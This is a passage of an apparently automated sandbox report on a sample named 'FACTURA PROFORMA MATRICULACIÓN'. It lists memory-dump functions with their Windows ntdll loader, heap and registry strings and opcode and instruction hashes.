                                                  • Associated: 00000002.00000002.84426043945.000000003682D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_36700000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: @$DelegatedNtdll$\SystemRoot\system32\
                                                  • API String ID: 0-2391371766
                                                  • Opcode ID: de6edfd3e7dde679d90a0e57389130728b717b3ad1b5b4d96a476df774ed76b7
                                                  • Instruction ID: 098927d27a56306adeffdc2d08c95c8bc130b5fe047cab66a2823360bc000d38
                                                  • Opcode Fuzzy Hash: de6edfd3e7dde679d90a0e57389130728b717b3ad1b5b4d96a476df774ed76b7
                                                  • Instruction Fuzzy Hash: 3DB1B371604341AFEB11CF55CC84B6BB7E9EB48764F804929FA509F250EBB1E894CB92
                                                  Function 3680B2BC Relevance: 3.9, Strings: 3, Instructions: 180COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  • GlobalizationUserSettings, xrefs: 3680B3B4
                                                  • \Registry\Machine\SYSTEM\CurrentControlSet\Control\International, xrefs: 3680B3AA
                                                  • TargetNtPath, xrefs: 3680B3AF
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.84426043945.0000000036700000.00000040.00001000.00020000.00000000.sdmp, Offset: 36700000, based on PE: true
                                                  • Associated: 00000002.00000002.84426043945.0000000036829000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000002.00000002.84426043945.000000003682D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_36700000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: GlobalizationUserSettings$TargetNtPath$\Registry\Machine\SYSTEM\CurrentControlSet\Control\International
                                                  • API String ID: 0-505981995
                                                  • Opcode ID: 75616a9aecd608c4092596e58919372075dfc8403f737e0287306cfa2ae100fe
                                                  • Instruction ID: 7fd35a26a8b2877deeea9e45d01d3bcd24d4b620ad2cd96014023da4978ce1eb
                                                  • Opcode Fuzzy Hash: 75616a9aecd608c4092596e58919372075dfc8403f737e0287306cfa2ae100fe
                                                  • Instruction Fuzzy Hash: 80619F72D41629AFDB31DF59DC88BDDB7B8AB08714F8105E5A608AB250CB74DE84CF90
                                                  Function 3672F75B Relevance: 3.9, Strings: 3, Instructions: 167COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  • HEAP: , xrefs: 3678E442
                                                  • HEAP[%wZ]: , xrefs: 3678E435
                                                  • RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix), xrefs: 3678E455
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.84426043945.0000000036700000.00000040.00001000.00020000.00000000.sdmp, Offset: 36700000, based on PE: true
                                                  • Associated: 00000002.00000002.84426043945.0000000036829000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000002.00000002.84426043945.000000003682D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_36700000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: HEAP: $HEAP[%wZ]: $RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix)
                                                  • API String ID: 0-1340214556
                                                  • Opcode ID: 0fc39ad4dbc567083641241994c638f754d67c2982b1c779b28d21ece5719e76
                                                  • Instruction ID: 21429314211e1f6aa356a63767730cea66d3064b406b550155471bf57fbd16a8
                                                  • Opcode Fuzzy Hash: 0fc39ad4dbc567083641241994c638f754d67c2982b1c779b28d21ece5719e76
                                                  • Instruction Fuzzy Hash: 6D511435A50784AFF712CBA5C889F5ABBF9EF04744F8440A4E6448F692D738ED01CB52
                                                  Function 36751514 Relevance: 3.9, Strings: 3, Instructions: 166COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  • LdrpCompleteMapModule, xrefs: 3679A39D
                                                  • minkernel\ntdll\ldrmap.c, xrefs: 3679A3A7
                                                  • Could not validate the crypto signature for DLL %wZ, xrefs: 3679A396
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.84426043945.0000000036700000.00000040.00001000.00020000.00000000.sdmp, Offset: 36700000, based on PE: true
                                                  • Associated: 00000002.00000002.84426043945.0000000036829000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000002.00000002.84426043945.000000003682D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_36700000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
                                                  • API String ID: 0-1676968949
                                                  • Opcode ID: 6ace0eac20ff62406046e51dbba9d45954afe28db93f7cb88c292ba439ab11ac
                                                  • Instruction ID: 1bbd4cd85f1ac31f384d00d3ed52c55e865638c92b80e50413dd6b32f4a5cbfd
                                                  • Opcode Fuzzy Hash: 6ace0eac20ff62406046e51dbba9d45954afe28db93f7cb88c292ba439ab11ac
                                                  • Instruction Fuzzy Hash: F4515674E00741DBF711CB69C848B6A7BE2EB00758FE146E4EA519F2E2DB70E980CB41
                                                  Function 367DD62C Relevance: 3.9, Strings: 3, Instructions: 163COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  • HEAP: , xrefs: 367DD79F
                                                  • Heap block at %p modified at %p past requested size of %Ix, xrefs: 367DD7B2
                                                  • HEAP[%wZ]: , xrefs: 367DD792
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.84426043945.0000000036700000.00000040.00001000.00020000.00000000.sdmp, Offset: 36700000, based on PE: true
                                                  • Associated: 00000002.00000002.84426043945.0000000036829000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000002.00000002.84426043945.000000003682D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_36700000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: HEAP: $HEAP[%wZ]: $Heap block at %p modified at %p past requested size of %Ix
                                                  • API String ID: 0-3815128232
                                                  • Opcode ID: 074cb8c8cdc15d10beb10e3620bb353910d20958e8fba7a48120af90af49efc2
                                                  • Instruction ID: 87095fceb7e6a37c404c28ea8ee81c0cadcdd2945e4e26127c6d57aeb3b109dd
                                                  • Opcode Fuzzy Hash: 074cb8c8cdc15d10beb10e3620bb353910d20958e8fba7a48120af90af49efc2
                                                  • Instruction Fuzzy Hash: 65512478500360EEF320CA2AC84477677E2DF453D8FD08C89E4D58F185EA26E847DBA0
                                                  Function 3672753F Relevance: 3.9, Strings: 3, Instructions: 132COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.84426043945.0000000036700000.00000040.00001000.00020000.00000000.sdmp, Offset: 36700000, based on PE: true
                                                  • Associated: 00000002.00000002.84426043945.0000000036829000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000002.00000002.84426043945.000000003682D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_36700000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: HEAP: $HEAP[%wZ]: $Invalid address specified to %s( %p, %p )
                                                  • API String ID: 0-1151232445
                                                  • Opcode ID: 07f623d3a7c3dc7523d546b5e7cfde5b0917b49e1f9e2eb16908d0a3ef65869f
                                                  • Instruction ID: 80804b977a557599562941b29baaa21a80fd84436c878e74adcf70da79ff697d
                                                  • Opcode Fuzzy Hash: 07f623d3a7c3dc7523d546b5e7cfde5b0917b49e1f9e2eb16908d0a3ef65869f
                                                  • Instruction Fuzzy Hash: 63412978A003408FFB15CA2AC5C97B5B7F29F01249FF484AAC8858F556EBB4D845CB71
                                                  Function 367615EF Relevance: 3.9, Strings: 3, Instructions: 127COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  • TlsVector %p Index %d : %d bytes copied from %p to %p, xrefs: 367A1943
                                                  • minkernel\ntdll\ldrtls.c, xrefs: 367A1954
                                                  • LdrpAllocateTls, xrefs: 367A194A
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.84426043945.0000000036700000.00000040.00001000.00020000.00000000.sdmp, Offset: 36700000, based on PE: true
                                                  • Associated: 00000002.00000002.84426043945.0000000036829000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000002.00000002.84426043945.000000003682D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_36700000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: LdrpAllocateTls$TlsVector %p Index %d : %d bytes copied from %p to %p$minkernel\ntdll\ldrtls.c
                                                  • API String ID: 0-4274184382
                                                  • Opcode ID: 5fa9d68a043f82742118fbbf1296ff042f588642ee447747fa53a0de55e20ae3
                                                  • Instruction ID: 06c35641d9560f5b484c70452b475436eda12adceb98cc3d7f47c25a1e2c0f89
                                                  • Opcode Fuzzy Hash: 5fa9d68a043f82742118fbbf1296ff042f588642ee447747fa53a0de55e20ae3
                                                  • Instruction Fuzzy Hash: 9E417CB5A01704EFEB15CFA9CC45BADBBB6FF48314F948129E505AB351DB34A801CB90
                                                  Function 367BB214 Relevance: 3.9, Strings: 3, Instructions: 107COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  • \Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\, xrefs: 367BB2B2
                                                  • @, xrefs: 367BB2F0
                                                  • GlobalFlag, xrefs: 367BB30F
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.84426043945.0000000036700000.00000040.00001000.00020000.00000000.sdmp, Offset: 36700000, based on PE: true
                                                  • Associated: 00000002.00000002.84426043945.0000000036829000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000002.00000002.84426043945.000000003682D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_36700000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: @$GlobalFlag$\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\
                                                  • API String ID: 0-4192008846
                                                  • Opcode ID: 7124ffc4876a46aaa4dbb5bd13ebd9790f8ff809405c71c2914fc0b126eef023
                                                  • Instruction ID: 8ccc3ba072ef603a142723c3bfceb3096753bad7f746dadcfb3391664ce23af6
                                                  • Opcode Fuzzy Hash: 7124ffc4876a46aaa4dbb5bd13ebd9790f8ff809405c71c2914fc0b126eef023
                                                  • Instruction Fuzzy Hash: 8E314DB1D00209AFDF10DFA5DC88AEEBBBDEF44744F940469EA15AB151DB749A04CB90
                                                  Function 36761527 Relevance: 3.8, Strings: 3, Instructions: 98COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  • DLL "%wZ" has TLS information at %p, xrefs: 367A184A
                                                  • minkernel\ntdll\ldrtls.c, xrefs: 367A185B
                                                  • LdrpInitializeTls, xrefs: 367A1851
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.84426043945.0000000036700000.00000040.00001000.00020000.00000000.sdmp, Offset: 36700000, based on PE: true
                                                  • Associated: 00000002.00000002.84426043945.0000000036829000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000002.00000002.84426043945.000000003682D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_36700000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: DLL "%wZ" has TLS information at %p$LdrpInitializeTls$minkernel\ntdll\ldrtls.c
                                                  • API String ID: 0-931879808
                                                  • Opcode ID: 36f7360faba44b41d32a5c4887a458c1325878f5e43245be79f9ee6973aca834
                                                  • Instruction ID: b007dd679c85d3ed7469a3c2e219cd0b22a4f2621ec83f070e3b9c03d30436e4
                                                  • Opcode Fuzzy Hash: 36f7360faba44b41d32a5c4887a458c1325878f5e43245be79f9ee6973aca834
                                                  • Instruction Fuzzy Hash: 18316D71A50300EFF7108B5ACC4CF6ABB69AB44B58F910129EA41BF181EB70ED8587D1
                                                  Function 367B85AA Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  • AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 367B85DE
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.84426043945.0000000036700000.00000040.00001000.00020000.00000000.sdmp, Offset: 36700000, based on PE: true
                                                  • Associated: 00000002.00000002.84426043945.0000000036829000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000002.00000002.84426043945.000000003682D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_36700000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
                                                  • API String ID: 0-702105204
                                                  • Opcode ID: f5fa50771a052b5e901e3aa74d03c2983a1888420e0959ff281e180b42fb1008
                                                  • Instruction ID: fb09cb0dc66bca57ef8429a81fa68832b7b85848025e236d1cd303a237319eb2
                                                  • Opcode Fuzzy Hash: f5fa50771a052b5e901e3aa74d03c2983a1888420e0959ff281e180b42fb1008
                                                  • Instruction Fuzzy Hash: 36017BB55213149FDF205F12CC88B2A3B67EF48398FC00059E6011F093CB20DC81CA96
                                                  Function 36735622 Relevance: 3.1, APIs: 2, Instructions: 104timeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.84426043945.0000000036700000.00000040.00001000.00020000.00000000.sdmp, Offset: 36700000, based on PE: true
                                                  • Associated: 00000002.00000002.84426043945.0000000036829000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000002.00000002.84426043945.000000003682D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_36700000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID: DebugPrintTimes
                                                  • String ID:
                                                  • API String ID: 3446177414-0
                                                  • Opcode ID: 72cd53a6f3c93c0dff1ddde68922d7b09380f9a467b1431c08f69973d3ed491a
                                                  • Instruction ID: 36e58ac52c229814ac8f6f65ef18d7d11638b9e7928c5b33055fb20f80a1f4c8
                                                  • Opcode Fuzzy Hash: 72cd53a6f3c93c0dff1ddde68922d7b09380f9a467b1431c08f69973d3ed491a
                                                  • Instruction Fuzzy Hash: 5031D331612B12EFF7469B25CD44A9AF7A6BF44B94FA04119DA008BA51EB70E821CFC1
                                                  Function 367B174B Relevance: 2.8, Strings: 2, Instructions: 278COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.84426043945.0000000036700000.00000040.00001000.00020000.00000000.sdmp, Offset: 36700000, based on PE: true
                                                  • Associated: 00000002.00000002.84426043945.0000000036829000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000002.00000002.84426043945.000000003682D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_36700000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: @$AddD
                                                  • API String ID: 0-2525844869
                                                  • Opcode ID: 1dc25664d785a5f6ad7885278326cf203f8bd6c648f6154ad94c49d023969a12
                                                  • Instruction ID: fc38fbdffbf2ec0ee44816d2834c6e47a20dfc352cdee0bfc757a9b39a2ae1dc
                                                  • Opcode Fuzzy Hash: 1dc25664d785a5f6ad7885278326cf203f8bd6c648f6154ad94c49d023969a12
                                                  • Instruction Fuzzy Hash: D2A18CB6504340AFE714CB15C844FABBBE9FF84744F904A2EF9958B150E7B0E909CB62
                                                  Function 367AE372 Relevance: 2.7, Strings: 2, Instructions: 179COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.84426043945.0000000036700000.00000040.00001000.00020000.00000000.sdmp, Offset: 36700000, based on PE: true
                                                  • Associated: 00000002.00000002.84426043945.0000000036829000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000002.00000002.84426043945.000000003682D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_36700000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID: Legacy$UEFI
                                                  • API String ID: 2994545307-634100481
                                                  • Opcode ID: 364a268f30f81b7096db5e390736890d15ee8f9b10fb287d096acd248c4baa44
                                                  • Instruction ID: ac3f36a9f8a7cfce3d65f094bc6bb04b8e01d2f7228a482ad7a8684ef432566f
                                                  • Opcode Fuzzy Hash: 364a268f30f81b7096db5e390736890d15ee8f9b10fb287d096acd248c4baa44
                                                  • Instruction Fuzzy Hash: 46615C71E103189FEB14CFA9DC40AADBBB9BB44344F94852AE649EF351EB30D940DB50
                                                  Function 3680B55F Relevance: 2.7, Strings: 2, Instructions: 168COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  • \Registry\Machine\System\CurrentControlSet\Control\CommonGlobUserSettings\, xrefs: 3680B5C4
                                                  • RedirectedKey, xrefs: 3680B60E
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.84426043945.0000000036700000.00000040.00001000.00020000.00000000.sdmp, Offset: 36700000, based on PE: true
                                                  • Associated: 00000002.00000002.84426043945.0000000036829000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000002.00000002.84426043945.000000003682D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_36700000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: RedirectedKey$\Registry\Machine\System\CurrentControlSet\Control\CommonGlobUserSettings\
                                                  • API String ID: 0-1388552009
                                                  • Opcode ID: e343f939d63399f171a29776c42d8c3009a45ced9f925989ea306f1e738b09a6
                                                  • Instruction ID: 7287f012ab135cea9104da8a2729b967f69fd0227214ac53f122112f650df290
                                                  • Opcode Fuzzy Hash: e343f939d63399f171a29776c42d8c3009a45ced9f925989ea306f1e738b09a6
                                                  • Instruction Fuzzy Hash: 4C6115B5C01218EFEB11DFA5CC88ADEBBB9FB08704F50445AE605E7240DB759A49CFA0
                                                  Function 3674F640 Relevance: 2.7, Strings: 2, Instructions: 159COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.84426043945.0000000036700000.00000040.00001000.00020000.00000000.sdmp, Offset: 36700000, based on PE: true
                                                  • Associated: 00000002.00000002.84426043945.0000000036829000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000002.00000002.84426043945.000000003682D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_36700000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID: DebugPrintTimes
                                                  • String ID: $$$
                                                  • API String ID: 3446177414-233714265
                                                  • Opcode ID: 27911b5ead196f2a6d7970ad2ebfc015863698d466dcaaa01d8427e01f5b9565
                                                  • Instruction ID: 3169b566dc2a6e7730ddd3ceada02e60d8c7a06eac44aacbbdb5faa8c23964ce
                                                  • Opcode Fuzzy Hash: 27911b5ead196f2a6d7970ad2ebfc015863698d466dcaaa01d8427e01f5b9565
                                                  • Instruction Fuzzy Hash: 5561D075E01749CFE722DF65C988BBDB7F2BB84304F908469D2046F651CB38A942CB92
                                                  Function 367306CF Relevance: 2.6, Strings: 2, Instructions: 95COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.84426043945.0000000036700000.00000040.00001000.00020000.00000000.sdmp, Offset: 36700000, based on PE: true
                                                  • Associated: 00000002.00000002.84426043945.0000000036829000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000002.00000002.84426043945.000000003682D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_36700000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: r6$ r6
                                                  • API String ID: 0-1618567006
                                                  • Opcode ID: 7b35a9f65e3050b61c5b80d22b6cb73cf15f29e086afa528f3a6f49320aea7a6
                                                  • Instruction ID: 384d23242a51bf0ae5a2ed75d45eb62efb07bd62d8f7e52acd81aa96cf4e70f2
                                                  • Opcode Fuzzy Hash: 7b35a9f65e3050b61c5b80d22b6cb73cf15f29e086afa528f3a6f49320aea7a6
                                                  • Instruction Fuzzy Hash: 3D31F636A167119FDB11DE248C84E6B77A6AF846A4FA14528FD849F311DB30CC01CFE2
                                                  Function 367633D0 Relevance: 2.6, Strings: 2, Instructions: 66COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  • SXS: %s() bad parameters:SXS: Map : 0x%pSXS: EntryCount : 0x%lx, xrefs: 367A289F
                                                  • RtlpInitializeAssemblyStorageMap, xrefs: 367A289A
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.84426043945.0000000036700000.00000040.00001000.00020000.00000000.sdmp, Offset: 36700000, based on PE: true
                                                  • Associated: 00000002.00000002.84426043945.0000000036829000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000002.00000002.84426043945.000000003682D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_36700000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: RtlpInitializeAssemblyStorageMap$SXS: %s() bad parameters:SXS: Map : 0x%pSXS: EntryCount : 0x%lx
                                                  • API String ID: 0-2653619699
                                                  • Opcode ID: ef931ba75e507c859a2b883b07973a8906af976947159c9d147fcc8b62994438
                                                  • Instruction ID: b0e3d07e7ff422718c47acb19078386ce54901adefd09141004f111a5a45cc9a
                                                  • Opcode Fuzzy Hash: ef931ba75e507c859a2b883b07973a8906af976947159c9d147fcc8b62994438
                                                  • Instruction Fuzzy Hash: C1110672F00314ABF7168A4ACC45F7A7AA9DB84758FA48029BE049F344DA75DD00C6A5
                                                  Function 3676A4F0 Relevance: 2.5, Strings: 2, Instructions: 38COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.84426043945.0000000036700000.00000040.00001000.00020000.00000000.sdmp, Offset: 36700000, based on PE: true
                                                  • Associated: 00000002.00000002.84426043945.0000000036829000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000002.00000002.84426043945.000000003682D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_36700000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID: Cleanup Group$Threadpool!
                                                  • API String ID: 2994545307-4008356553
                                                  • Opcode ID: 9fcdf714a754c92928f48362dcf1ef859abf537806df666ffdd2c05eb392926d
                                                  • Instruction ID: ce8655e0c01ad1e7bbae615b8efa0e8b2ab5f2291a0ff7b7436cdcf7ae1d620e
                                                  • Opcode Fuzzy Hash: 9fcdf714a754c92928f48362dcf1ef859abf537806df666ffdd2c05eb392926d
                                                  • Instruction Fuzzy Hash: E301F4B2210740AFE311CF24CE45B1277E8EB44B19F408979EA58DB5A2E774D984CB46
                                                  Function 3673C6E0 Relevance: 2.2, Strings: 1, Instructions: 960COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.84426043945.0000000036700000.00000040.00001000.00020000.00000000.sdmp, Offset: 36700000, based on PE: true
                                                  • Associated: 00000002.00000002.84426043945.0000000036829000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000002.00000002.84426043945.000000003682D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_36700000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: MUI
                                                  • API String ID: 0-1339004836
                                                  • Opcode ID: 6595d97fcb4b435492f2633c006eea090bb5f74049b4f7a54589b24a1ad6ef81
                                                  • Instruction ID: e028bf1c111b9b3106085f2db7f3b6a2c33fdf7b3094eb9db4fe30ac226c73ff
                                                  • Opcode Fuzzy Hash: 6595d97fcb4b435492f2633c006eea090bb5f74049b4f7a54589b24a1ad6ef81
                                                  • Instruction Fuzzy Hash: 9B826E79E023188FEB14CF69C9807ADB7B2BF49754FA08169D859AF252DB309D41CB90
                                                  Function 367364F0 Relevance: 1.9, APIs: 1, Instructions: 383COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.84426043945.0000000036700000.00000040.00001000.00020000.00000000.sdmp, Offset: 36700000, based on PE: true
                                                  • Associated: 00000002.00000002.84426043945.0000000036829000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000002.00000002.84426043945.000000003682D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_36700000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 6d1f83bf6e0c36a1758b57fd292d395d117072e01bc30dea7a8ed9532b21a46d
                                                  • Instruction ID: 45d4e0b219f879c59bcff6df14fc31590e9548de886bcd504272888334d0b655
                                                  • Opcode Fuzzy Hash: 6d1f83bf6e0c36a1758b57fd292d395d117072e01bc30dea7a8ed9532b21a46d
                                                  • Instruction Fuzzy Hash: 44E1AE75909341CFD314CF28C480A6ABBE1FF89348FA0896DE5958B352EB31E955CBD2
                                                  Function 3675E507 Relevance: 1.8, APIs: 1, Instructions: 278COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.84426043945.0000000036700000.00000040.00001000.00020000.00000000.sdmp, Offset: 36700000, based on PE: true
                                                  • Associated: 00000002.00000002.84426043945.0000000036829000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000002.00000002.84426043945.000000003682D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_36700000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 834746aa159237b4b2fcf214ec3f40e0de84d199ce7ed8fb4b864887278ef00d
                                                  • Instruction ID: e3a948d91b7c42a315c868ea3750f2c015fd25694d946ef17b09917f77ea3a6c
                                                  • Opcode Fuzzy Hash: 834746aa159237b4b2fcf214ec3f40e0de84d199ce7ed8fb4b864887278ef00d
                                                  • Instruction Fuzzy Hash: F5A1F371E10324AFFB11CBA5CC48BAD77E6EB05758F924161EB10AF280D7789941CBC5
                                                  Function 36731051 Relevance: 1.8, APIs: 1, Instructions: 259timeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.84426043945.0000000036700000.00000040.00001000.00020000.00000000.sdmp, Offset: 36700000, based on PE: true
                                                  • Associated: 00000002.00000002.84426043945.0000000036829000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000002.00000002.84426043945.000000003682D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_36700000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID: DebugPrintTimes
                                                  • String ID:
                                                  • API String ID: 3446177414-0
                                                  • Opcode ID: eea59fe10ee930d30069dee7ce8a9aa85c6df1b04c0ada750286fbd45d6b85b7
                                                  • Instruction ID: 5ff2acf7bf3cdbfffff28f0c759fb65c88465db0e0f84d348f230485ac33ef9e
                                                  • Opcode Fuzzy Hash: eea59fe10ee930d30069dee7ce8a9aa85c6df1b04c0ada750286fbd45d6b85b7
                                                  • Instruction Fuzzy Hash: 3FB115B59093808FD354CF29C480A5AFBF1BF88344F54496EE999CB352D775E846CB82
                                                  Function 367B55E0 Relevance: 1.7, APIs: 1, Instructions: 246COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.84426043945.0000000036700000.00000040.00001000.00020000.00000000.sdmp, Offset: 36700000, based on PE: true
